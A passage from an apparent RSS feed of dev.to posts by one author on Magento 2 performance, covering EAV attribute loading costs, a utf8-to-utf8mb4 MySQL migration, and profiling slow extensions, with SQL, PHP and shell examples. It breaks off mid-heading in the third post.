      <description>&lt;p&gt;Open a product in Magento 2 and ask your database what just happened. A single &lt;code&gt;addAttributeToSelect('*')&lt;/code&gt; load does not fire one query. It fires one per attribute backend type, plus the static columns, plus stock and media. The same flexibility that lets you add a product attribute from the admin with no schema migration is what makes a full product load expensive.&lt;/p&gt;

&lt;p&gt;That is the EAV tax. Most of the "Magento is slow" reports I get handed are paying it without knowing.&lt;/p&gt;

&lt;h2&gt;
  
  
  What EAV actually stores
&lt;/h2&gt;

&lt;p&gt;A product is not a row. It is a row in &lt;code&gt;catalog_product_entity&lt;/code&gt; for the static columns, and then its attribute values are scattered across typed value tables: &lt;code&gt;catalog_product_entity_varchar&lt;/code&gt;, &lt;code&gt;_int&lt;/code&gt;, &lt;code&gt;_decimal&lt;/code&gt;, &lt;code&gt;_text&lt;/code&gt;, &lt;code&gt;_datetime&lt;/code&gt;. Each value row is keyed by &lt;code&gt;entity_id&lt;/code&gt;, &lt;code&gt;attribute_id&lt;/code&gt;, and &lt;code&gt;store_id&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;To rebuild one product with all its attributes, Magento reads across every one of those tables and stitches the rows back into an object. Add a store view and the store-scoped values double the work.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;entity_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;dec&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;price&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;catalog_product_entity&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;
&lt;span class="k"&gt;LEFT&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="n"&gt;catalog_product_entity_varchar&lt;/span&gt; &lt;span class="n"&gt;var&lt;/span&gt;
  &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attribute_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;73&lt;/span&gt;
&lt;span class="k"&gt;LEFT&lt;/span&gt; &lt;span class="k"&gt;JOIN&lt;/span&gt; &lt;span class="n"&gt;catalog_product_entity_decimal&lt;/span&gt; &lt;span class="nb"&gt;dec&lt;/span&gt;
  &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="nb"&gt;dec&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="nb"&gt;dec&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attribute_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;77&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;42&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That is two attributes. Now picture &lt;code&gt;*&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why &lt;code&gt;addAttributeToSelect('*')&lt;/code&gt; is the trap
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;*&lt;/code&gt; means every attribute in the set. On a category grid showing 36 products, the card needs maybe six fields: name, price, thumbnail, url key, status, visibility. With &lt;code&gt;*&lt;/code&gt; you loaded sixty. The other fifty-four were read, joined, hydrated, and thrown away before the page rendered.&lt;/p&gt;

&lt;p&gt;Name the columns you actually use:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$collection&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;addAttributeToSelect&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;
    &lt;span class="s1"&gt;'name'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'price'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'small_image'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'url_key'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'status'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'visibility'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;]);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This one change is the single biggest win I see on slow listing pages. It costs nothing and it ships in five minutes.&lt;/p&gt;

&lt;h2&gt;
  
  
  Stop rendering listings off the product collection
&lt;/h2&gt;

&lt;p&gt;The deeper fix is to not reassemble products from EAV on a listing at all. Category pages, layered navigation, and search should read from the index tables and OpenSearch, not loop a collection that re-hydrates every card from the value tables.&lt;/p&gt;

&lt;p&gt;Magento already maintains flattened index tables for this: &lt;code&gt;catalog_category_product_index&lt;/code&gt; for membership, the price index for prices, the fulltext index for search. A tuned category page leans on those and only touches EAV for the handful of attributes the card template prints. If your category controller is iterating a product collection with &lt;code&gt;*&lt;/code&gt;, that is the thing to pull apart first.&lt;/p&gt;

&lt;h2&gt;
  
  
  The flat catalog is not your escape hatch
&lt;/h2&gt;

&lt;p&gt;Older Magento answered EAV cost with the flat catalog: denormalize every attribute into one wide &lt;code&gt;catalog_product_flat&lt;/code&gt; table and read a single row. Adobe deprecated it, and for good reason. It falls over the moment you have thousands of attributes because MySQL caps columns per table, and it adds a heavy indexer you have to keep green. On a current build, do not turn it on.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I do instead
&lt;/h2&gt;

&lt;p&gt;Select named attributes, never &lt;code&gt;*&lt;/code&gt;, in any collection that renders to a user. Push listing and filtering to OpenSearch so the storefront reads an index instead of replaying joins. For bulk reads like exports and feeds, walk the catalog by &lt;code&gt;entity_id&lt;/code&gt; with keyset pagination and select only the fields you need, because a full &lt;code&gt;*&lt;/code&gt; load across a six-figure catalog will melt the box.&lt;/p&gt;
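
&lt;p&gt;Keyset pagination is easier to see in code than in prose. The sketch below is deliberately framework-free: &lt;code&gt;walkByEntityId()&lt;/code&gt; and &lt;code&gt;$fetchPage&lt;/code&gt; are hypothetical names, and the "catalog" is an in-memory array standing in for a query that filters on &lt;code&gt;entity_id&lt;/code&gt; greater than the last one seen.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;/**
 * Hypothetical keyset walker. $fetchPage(int $afterId, int $limit) must
 * return rows ordered by entity_id ascending, each with an 'entity_id' key,
 * e.g. from "WHERE entity_id &amp;gt; :afterId ORDER BY entity_id LIMIT :limit".
 */
function walkByEntityId(callable $fetchPage, int $pageSize): Generator
{
    if ($pageSize &amp;lt; 1) {
        throw new InvalidArgumentException('Page size must be at least 1.');
    }

    $lastId = 0;
    do {
        $rows = $fetchPage($lastId, $pageSize);
        foreach ($rows as $row) {
            $lastId = (int) $row['entity_id']; // the next page starts after this ID
            yield $row;
        }
    } while (count($rows) === $pageSize); // a short page means we reached the end
}

// In-memory stand-in for the catalog so the sketch runs without a database.
$catalog = array_map(
    fn (int $id): array =&amp;gt; ['entity_id' =&amp;gt; $id, 'sku' =&amp;gt; "SKU-$id"],
    range(1, 2500)
);
$fetchPage = function (int $afterId, int $limit) use ($catalog): array {
    $rest = array_filter($catalog, fn (array $row): bool =&amp;gt; $row['entity_id'] &amp;gt; $afterId);
    return array_slice($rest, 0, $limit);
};

$seen = 0;
foreach (walkByEntityId($fetchPage, 1000) as $row) {
    $seen++;
}
echo $seen, " rows walked\n";
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Unlike &lt;code&gt;OFFSET&lt;/code&gt; paging, each page here costs the same no matter how deep into the catalog you are, because the database seeks straight to the last ID instead of counting past skipped rows.&lt;/p&gt;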

&lt;p&gt;Then measure. Turn on the query log and count statements per request. When a single category page fires several hundred queries, EAV reassembly is almost always the reason, and now you know exactly which line put them there.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>php</category>
      <category>performance</category>
      <category>mysql</category>
    </item>
    <item>
      <title>Migrating a Magento 2 store from utf8 to utf8mb4 without losing data</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Mon, 22 Jun 2026 09:17:17 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/migrating-a-magento-2-store-from-utf8-to-utf8mb4-without-losing-data-khn</link>
      <guid>https://dev.to/iamrobindhiman/migrating-a-magento-2-store-from-utf8-to-utf8mb4-without-losing-data-khn</guid>
      <description>&lt;p&gt;A customer signed up with an emoji in their display name, and the row saved with everything after the emoji chopped off. No error in the log. The column was &lt;code&gt;utf8&lt;/code&gt;, and in MySQL &lt;code&gt;utf8&lt;/code&gt; has never been real UTF-8.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;code&gt;utf8&lt;/code&gt; is a three-byte lie
&lt;/h2&gt;

&lt;p&gt;MySQL's &lt;code&gt;utf8&lt;/code&gt; is an alias for &lt;code&gt;utf8mb3&lt;/code&gt;: at most three bytes per character. It covers the Basic Multilingual Plane and stops there. Emoji, many CJK extension characters, and a pile of modern symbols are four bytes, and they do not fit.&lt;/p&gt;

&lt;p&gt;What happens when a four-byte character lands in a &lt;code&gt;utf8mb3&lt;/code&gt; column depends on your SQL mode. In strict mode you get &lt;code&gt;Incorrect string value: '\xF0\x9F...'&lt;/code&gt;. Without it, MySQL silently truncates the string at the offending byte and saves only what came before it. The second case is the dangerous one: no error, partial data, found weeks later in a support queue.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;utf8mb4&lt;/code&gt; is the fix. It is actual UTF-8, up to four bytes per character. New Magento installs use it. Plenty of stores set up years ago are still on &lt;code&gt;utf8mb3&lt;/code&gt; and inherit every one of these bugs.&lt;/p&gt;

&lt;h2&gt;
  
  
  The migration looks like one line. It isn't.
&lt;/h2&gt;

&lt;p&gt;The naive version:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;ALTER&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;customer_entity&lt;/span&gt; &lt;span class="k"&gt;CONVERT&lt;/span&gt; &lt;span class="k"&gt;TO&lt;/span&gt; &lt;span class="nb"&gt;CHARACTER&lt;/span&gt; &lt;span class="k"&gt;SET&lt;/span&gt; &lt;span class="n"&gt;utf8mb4&lt;/span&gt; &lt;span class="k"&gt;COLLATE&lt;/span&gt; &lt;span class="n"&gt;utf8mb4_unicode_ci&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run that across a real Magento schema and you hit this fast:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ERROR 1071 (42000): Specified key was too long; max key length is 767 bytes
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;An index on a &lt;code&gt;VARCHAR&lt;/code&gt; column is sized in bytes, and MySQL budgets for the widest possible character. Under &lt;code&gt;utf8mb3&lt;/code&gt;, &lt;code&gt;VARCHAR(255)&lt;/code&gt; costs 255 x 3 = 765 bytes, just under the old 767-byte limit. Under &lt;code&gt;utf8mb4&lt;/code&gt; the same column wants 255 x 4 = 1020 bytes, and the index is rejected.&lt;/p&gt;

&lt;p&gt;Two ways out, and which one you need depends on your MySQL version:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;MySQL 5.7 with &lt;code&gt;innodb_large_prefix&lt;/code&gt; enabled, or MySQL 8.0&lt;/strong&gt; (where the setting is gone and large prefixes are always on): the index limit is 3072 bytes on &lt;code&gt;DYNAMIC&lt;/code&gt; or &lt;code&gt;COMPRESSED&lt;/code&gt; row format. Most columns just work. This is where you want to be.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Older or misconfigured servers&lt;/strong&gt; still capped at 767 bytes: indexed string columns have to drop to 191 characters (191 x 4 = 764 bytes) or index a prefix. 191 isn't magic, it is just the largest count that still fits.&lt;/li&gt;
&lt;/ul&gt;
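
&lt;p&gt;The byte arithmetic behind both limits is worth checking once by hand. A small sketch, where &lt;code&gt;maxIndexableChars()&lt;/code&gt; is a hypothetical helper name:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;/**
 * Largest VARCHAR length that can be fully indexed, given the index byte
 * limit and the charset's maximum bytes per character.
 */
function maxIndexableChars(int $limitBytes, int $bytesPerChar): int
{
    return intdiv($limitBytes, $bytesPerChar);
}

printf("utf8mb3 VARCHAR(255): %d bytes\n", 255 * 3);                        // 765
printf("utf8mb4 VARCHAR(255): %d bytes\n", 255 * 4);                        // 1020
printf("utf8mb4 under 767 bytes: %d chars\n", maxIndexableChars(767, 4));   // 191
printf("utf8mb4 under 3072 bytes: %d chars\n", maxIndexableChars(3072, 4)); // 768
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;So under the 3072-byte limit a full &lt;code&gt;VARCHAR(255)&lt;/code&gt; index fits with room to spare, and under the 767-byte limit it does not.&lt;/p&gt;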

&lt;p&gt;Check the row format before you start:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SHOW&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;STATUS&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;Name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'customer_entity'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  The column is only half of it
&lt;/h2&gt;

&lt;p&gt;Converting the column does nothing if the application still talks to the database as &lt;code&gt;utf8mb3&lt;/code&gt;. Character set is negotiated on the connection. If the client opens with &lt;code&gt;SET NAMES utf8&lt;/code&gt;, a four-byte character is mangled in transit before it ever reaches your new &lt;code&gt;utf8mb4&lt;/code&gt; column.&lt;/p&gt;

&lt;p&gt;So the migration is three coordinated changes, not one:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Database and tables: &lt;code&gt;ALTER ... CONVERT TO CHARACTER SET utf8mb4&lt;/code&gt;. &lt;code&gt;CONVERT TO&lt;/code&gt; rewrites the table and converts existing data, not just the default for new rows.&lt;/li&gt;
&lt;li&gt;Server defaults in &lt;code&gt;my.cnf&lt;/code&gt; (&lt;code&gt;character-set-server&lt;/code&gt;, &lt;code&gt;collation-server&lt;/code&gt;), so new tables are born correct.&lt;/li&gt;
&lt;li&gt;The application connection charset, so reads and writes negotiate &lt;code&gt;utf8mb4&lt;/code&gt; end to end.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Miss the third and you will swear the migration worked from the &lt;code&gt;mysql&lt;/code&gt; CLI while the storefront keeps corrupting data.&lt;/p&gt;
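
&lt;p&gt;In Magento the connection charset is usually set through &lt;code&gt;initStatements&lt;/code&gt; in &lt;code&gt;app/etc/env.php&lt;/code&gt;. The fragment below is a sketch that assumes a stock single-connection layout. Host, credentials, and every other key are omitted, and your file may differ, so check it before changing anything.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;// app/etc/env.php (fragment; other keys omitted, layout assumed)
'db' =&amp;gt; [
    'connection' =&amp;gt; [
        'default' =&amp;gt; [
            // Older installs often carry 'SET NAMES utf8;' here.
            'initStatements' =&amp;gt; 'SET NAMES utf8mb4;',
        ],
    ],
],
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;After changing it, verify from the application side rather than the CLI: save a value containing an emoji through the storefront and read it back.&lt;/p&gt;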

&lt;h2&gt;
  
  
  Two things that bite mid-migration
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;CONVERT TO&lt;/code&gt; is a full table rewrite.&lt;/strong&gt; On a large &lt;code&gt;sales_order&lt;/code&gt; or &lt;code&gt;catalog_product_entity_varchar&lt;/code&gt; table that means a long lock. Do it in a maintenance window, or run it through &lt;code&gt;pt-online-schema-change&lt;/code&gt; or &lt;code&gt;gh-ost&lt;/code&gt; so the table stays writable.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Collations have to match across joins.&lt;/strong&gt; Convert some tables and not others and the next query that joins them throws &lt;code&gt;Illegal mix of collations&lt;/code&gt;. Pick one collation, apply it everywhere, and don't leave half the schema on the server default. &lt;code&gt;utf8mb4_unicode_ci&lt;/code&gt; is a safe, widely compatible choice.&lt;/p&gt;

&lt;h2&gt;
  
  
  The lesson isn't really about Magento
&lt;/h2&gt;

&lt;p&gt;This is a MySQL story, not a Magento one. Any application sitting on &lt;code&gt;utf8mb3&lt;/code&gt; carries the same latent bug and the same three-part fix. Magento just surfaces it early, because catalogs and customer data are full of exactly the international text and emoji that four bytes were invented for.&lt;/p&gt;

&lt;p&gt;If you are still on &lt;code&gt;utf8&lt;/code&gt;, you don't have a Unicode-safe store. You have one that hasn't met the wrong character yet.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>mysql</category>
      <category>php</category>
    </item>
    <item>
      <title>Which Magento extension is slowing you down? Stop guessing.</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Wed, 17 Jun 2026 13:18:10 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/which-magento-extension-is-slowing-you-down-stop-guessing-1mj3</link>
      <guid>https://dev.to/iamrobindhiman/which-magento-extension-is-slowing-you-down-stop-guessing-1mj3</guid>
      <description>&lt;p&gt;A store feels slow. Someone has installed forty extensions over three years. The usual advice is "disable them one at a time and see what helps." That is not debugging. That is guessing with extra steps, on production, with a fingers-crossed deploy at the end.&lt;/p&gt;

&lt;p&gt;You can do better. Magento 2 makes the cost of an extension measurable if you know where it spends your time. Here is how I find the culprit instead of guessing.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where an extension actually costs you
&lt;/h2&gt;

&lt;p&gt;A third-party module doesn't just "add features." On every request it can add work in four places:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Plugins (interceptors).&lt;/strong&gt; Every &lt;code&gt;&amp;lt;plugin&amp;gt;&lt;/code&gt; in a module's &lt;code&gt;di.xml&lt;/code&gt; wraps a method. Magento compiles these into interceptor classes, and at runtime each one is a layer the call passes through: before, around, after. A module with twenty plugins on hot paths is twenty extra layers on requests that fire constantly.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Observers.&lt;/strong&gt; Each &lt;code&gt;&amp;lt;observer&amp;gt;&lt;/code&gt; in &lt;code&gt;events.xml&lt;/code&gt; runs when its event dispatches. Subscribe to something like &lt;code&gt;controller_action_predispatch&lt;/code&gt; and your code runs on every single page.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layout.&lt;/strong&gt; Layout XML is merged on page render. Blocks that a module injects into shared containers run their templates whether or not anyone looks at them.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Queries.&lt;/strong&gt; The quiet one. A block or observer that does "just one more lookup" per item turns into N more queries on a category page.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;None of these are evil. They are how Magento is meant to be extended. The problem is volume and placement. Twenty cheap things on a page that renders a million times a day is not cheap.&lt;/p&gt;
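
&lt;p&gt;To make the "N more queries" point concrete, here is a minimal sketch in plain PHP. &lt;code&gt;StockLookup&lt;/code&gt; and its two methods are hypothetical stand-ins, not Magento classes, and the counter only simulates queries. It shows the shape of the problem, not a real measurement:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;?php
declare(strict_types=1);

/** Hypothetical lookup service that counts the queries it would run. */
final class StockLookup
{
    public int $queries = 0;

    public function forOne(int $productId): int
    {
        $this-&gt;queries++; // one simulated query per call
        return 10;
    }

    /** @return array&lt;int, int&gt; */
    public function forMany(array $productIds): array
    {
        $this-&gt;queries++; // one simulated query for the whole list
        return array_fill_keys($productIds, 10);
    }
}

$productIds = range(1, 24); // one category page of 24 items

$perItem = new StockLookup();
foreach ($productIds as $id) {
    $perItem-&gt;forOne($id);
}

$batched = new StockLookup();
$batched-&gt;forMany($productIds);

echo "per item: {$perItem-&gt;queries} queries, batched: {$batched-&gt;queries} query", PHP_EOL;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Same data, 24 round trips versus one. On a real page the per-item version usually hides inside a template or an observer, which is why it is easy to miss.&lt;/p&gt;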

&lt;h2&gt;
  
  
  Step 1: turn on the profiler
&lt;/h2&gt;

&lt;p&gt;Magento ships with a built-in profiler. Enable it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bin/magento dev:profiler:enable
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Pass the output type you want as an argument to that command (&lt;code&gt;html&lt;/code&gt; is the readable one) and load a slow page. You get a timing tree of the request: which methods ran, how long they took, how many times they were called. The "called N times" column is where extension problems hide. A method that runs once is fine; the same method at 1,400 calls is a loop someone didn't notice.&lt;/p&gt;

&lt;p&gt;For anything serious, reach for a real profiler. Blackfire or Xdebug locally, New Relic or another APM in production. Blackfire in particular gives you a call graph where you can see time attributed to a vendor namespace at a glance. That namespace is your answer.&lt;/p&gt;

&lt;h2&gt;
  
  
  Step 2: count what's actually attached
&lt;/h2&gt;

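&lt;p&gt;Before you dig through profiles, it helps to know what each module wires up. No tool needed. Just &lt;code&gt;grep&lt;/code&gt; the vendor tree and &lt;code&gt;app/code&lt;/code&gt; (the &lt;code&gt;-l&lt;/code&gt; flag lists the files that declare plugins or observers; pipe the output to &lt;code&gt;wc -l&lt;/code&gt; if you only want a count):&lt;br&gt;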
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# plugins declared across all modules&lt;/span&gt;
&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rl&lt;/span&gt; &lt;span class="s2"&gt;"&amp;lt;plugin"&lt;/span&gt; vendor/&lt;span class="k"&gt;*&lt;/span&gt;/module-&lt;span class="k"&gt;*&lt;/span&gt;/etc/ app/code/&lt;span class="k"&gt;*&lt;/span&gt;/&lt;span class="k"&gt;*&lt;/span&gt;/etc/

&lt;span class="c"&gt;# observers&lt;/span&gt;
&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rl&lt;/span&gt; &lt;span class="s2"&gt;"&amp;lt;observer"&lt;/span&gt; vendor/&lt;span class="k"&gt;*&lt;/span&gt;/module-&lt;span class="k"&gt;*&lt;/span&gt;/etc/ app/code/&lt;span class="k"&gt;*&lt;/span&gt;/&lt;span class="k"&gt;*&lt;/span&gt;/etc/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then read the offenders. A plugin on a repository's &lt;code&gt;save&lt;/code&gt; is usually fine. A plugin &lt;code&gt;around&lt;/code&gt; a method on &lt;code&gt;Magento\Framework\View\Element\Template&lt;/code&gt; or on the product collection load is a flag. Those paths run constantly, so even a cheap plugin adds up, and an &lt;code&gt;around&lt;/code&gt; plugin that never calls &lt;code&gt;$proceed()&lt;/code&gt; quietly skips the original method and every later plugin in the chain.&lt;/p&gt;
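
&lt;p&gt;For reference, a rough sketch of a well-behaved &lt;code&gt;around&lt;/code&gt; plugin that runs outside Magento. &lt;code&gt;PriceFormatter&lt;/code&gt; and &lt;code&gt;CurrencySuffixPlugin&lt;/code&gt; are made-up names, and the closure is only a stand-in for the callable that Magento's generated interceptor would pass in. The method signature follows Magento's around-plugin convention: the subject, then &lt;code&gt;$proceed&lt;/code&gt;, then the original arguments:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;?php
declare(strict_types=1);

// Hypothetical stand-in for an intercepted class.
final class PriceFormatter
{
    public function format(float $amount): string
    {
        return number_format($amount, 2, '.', '');
    }
}

// Hypothetical plugin using the around-plugin signature.
final class CurrencySuffixPlugin
{
    public function aroundFormat(PriceFormatter $subject, callable $proceed, float $amount): string
    {
        // Call $proceed once, pass the arguments through, keep its result.
        $result = $proceed($amount);

        return $result . ' EUR';
    }
}

$subject = new PriceFormatter();
$plugin = new CurrencySuffixPlugin();

// Stand-in for the "next step in the chain" callable.
$proceed = static fn (float $amount): string =&gt; $subject-&gt;format($amount);

$output = $plugin-&gt;aroundFormat($subject, $proceed, 9.5);
echo $output, PHP_EOL; // 9.50 EUR
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;If the plugin only needs to touch the arguments or the result, a &lt;code&gt;before&lt;/code&gt; or &lt;code&gt;after&lt;/code&gt; plugin does the same job without owning the call.&lt;/p&gt;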

&lt;h2&gt;
  
  
  Step 3: confirm with a controlled measurement
&lt;/h2&gt;

&lt;p&gt;Now you measure, not guess. Pick one suspect module. With the profiler on, capture the timing of a representative page. Disable that one module (&lt;code&gt;bin/magento module:disable Vendor_Module&lt;/code&gt;, then recompile with &lt;code&gt;setup:di:compile&lt;/code&gt; and flush with &lt;code&gt;cache:flush&lt;/code&gt;), capture the same page again. The delta is that module's real cost on that page: attributable, repeatable, defensible.&lt;/p&gt;

&lt;p&gt;This is still "disable a module," but it is the opposite of the shotgun approach: you disable the one the data pointed at, you measure both sides, and you can put a number on the result instead of a vibe.&lt;/p&gt;
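
&lt;p&gt;One way to keep that number honest is to take several samples on each side and compare medians, so a single slow request doesn't skew the result. A minimal sketch; the timings below are placeholders I made up to show the arithmetic, not real measurements, and &lt;code&gt;medianMs&lt;/code&gt; is a hypothetical helper:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;?php
declare(strict_types=1);

/** Median of a non-empty list of timings, in milliseconds. */
function medianMs(array $samples): float
{
    sort($samples);
    $count = count($samples);
    $middle = intdiv($count, 2);

    return $count % 2 === 1
        ? (float) $samples[$middle]
        : ($samples[$middle - 1] + $samples[$middle]) / 2;
}

// Placeholder numbers, not real measurements.
$withModule = [812, 790, 845, 801, 798];
$withoutModule = [655, 640, 671, 649, 660];

$delta = medianMs($withModule) - medianMs($withoutModule);
printf("median cost of the module on this page: %.0f ms\n", $delta); // 146 ms
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;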

&lt;h2&gt;
  
  
  What to do with the answer
&lt;/h2&gt;

&lt;p&gt;Once you know which module and which mechanism, you usually have three options, in order of preference:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Configure it out of the hot path.&lt;/strong&gt; Many modules attach to broad events or all pages when they only need one. A setting, or a small &lt;code&gt;di.xml&lt;/code&gt; override scoping their plugin to the right area, fixes it without touching their code.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Replace the mechanism.&lt;/strong&gt; An &lt;code&gt;around&lt;/code&gt; plugin doing work that a &lt;code&gt;before&lt;/code&gt; or &lt;code&gt;after&lt;/code&gt; could do, or an observer that should have been a plugin, can often be reworked in a thin module of your own.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Drop it.&lt;/strong&gt; If a module costs more than the feature is worth, and once you've measured you can actually make that call, remove it.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  The point
&lt;/h2&gt;

